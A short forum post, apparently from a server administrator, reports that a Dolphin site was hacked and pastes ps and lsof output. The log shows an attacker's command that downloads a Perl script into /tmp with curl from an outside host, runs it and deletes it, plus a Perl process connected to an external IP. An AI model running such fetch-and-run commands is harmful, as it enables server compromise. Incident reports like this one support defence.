Lately over the past two days we have been hacked on our installation of dolphin. Is anyone aware of the problem?
Hers the log as we got it.
root@megavolt [~]# ps auxg|grep perl
cumsnros 1597 0.0 0.0 5460 3452 ? SN 13:22 0:00 perl scanfeel.txt
cumsnros 11677 0.0 0.0 2444 1044 ? SN 07:07 0:00 sh -c cd /tmp;curl -O http://www.meetme2night.net//ray/modules/global/inc/gif/c.txt;perl c.txt;rm -f c.txt*;
root 26145 0.0 0.0 3000 732 pts/1 S 14:49 0:00 grep perl
root@megavolt [~]# lsof -p 1597
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
perl 1597 cumsnros cwd DIR 0,32 4096 56033394 /var/tmp
perl 1597 cumsnros rtd DIR 0,30 4096 112066818 /
perl 1597 cumsnros txt REG 0,30 12914 112990586 /usr/bin/perl
perl 1597 cumsnros mem REG 0,30 46680 112872182 /lib/libnss_files-2.5.so
perl 1597 cumsnros mem REG 0,30 99660 112871996 /lib/libnsl-2.5.so
perl 1597 cumsnros mem REG 0,30 13420 112872090 /lib/libutil-2.5.so
perl 1597 cumsnros mem REG 0,30 974532 112920190 /usr/lib/perl5/5.8.8/i686-
perl 1597 cumsnros mem REG 0,30 15532 112919692 /usr/lib/perl5/5.8.8/i686-linux/auto/IO/IO.so
perl 1597 cumsnros mem REG 0,30 124432 112872174 /lib/ld-2.5.so
perl 1597 cumsnros mem REG 0,30 1594552 112871798 /lib/libc-2.5.so
perl 1597 cumsnros mem REG 0,30 21287 112919602 /usr/lib/perl5/5.8.8/i686-linux/auto/Socket/Socket.so
perl 1597 cumsnros mem REG 0,30 43544 112873418 /lib/libcrypt-2.5.so
perl 1597 cumsnros mem REG 0,30 14644 112872086 /lib/libdl-2.5.so
perl 1597 cumsnros mem REG 0,30 206380 112872314 /lib/libm-2.5.so
perl 1597 cumsnros 0r FIFO 0,6 35205759 pipe
perl 1597 cumsnros 1w FIFO 0,6 35892244 pipe
perl 1597 cumsnros 2w FIFO 0,6 35205761 pipe
perl 1597 cumsnros 3u IPv4 35892796 TCP megavolt.apthost.com:42465->168.143.39.116:afs3-fileserver (ESTABLISHED)
perl 1597 cumsnros 1530r FIFO 0,6 35205761 pipe
root@megavolt [~]#
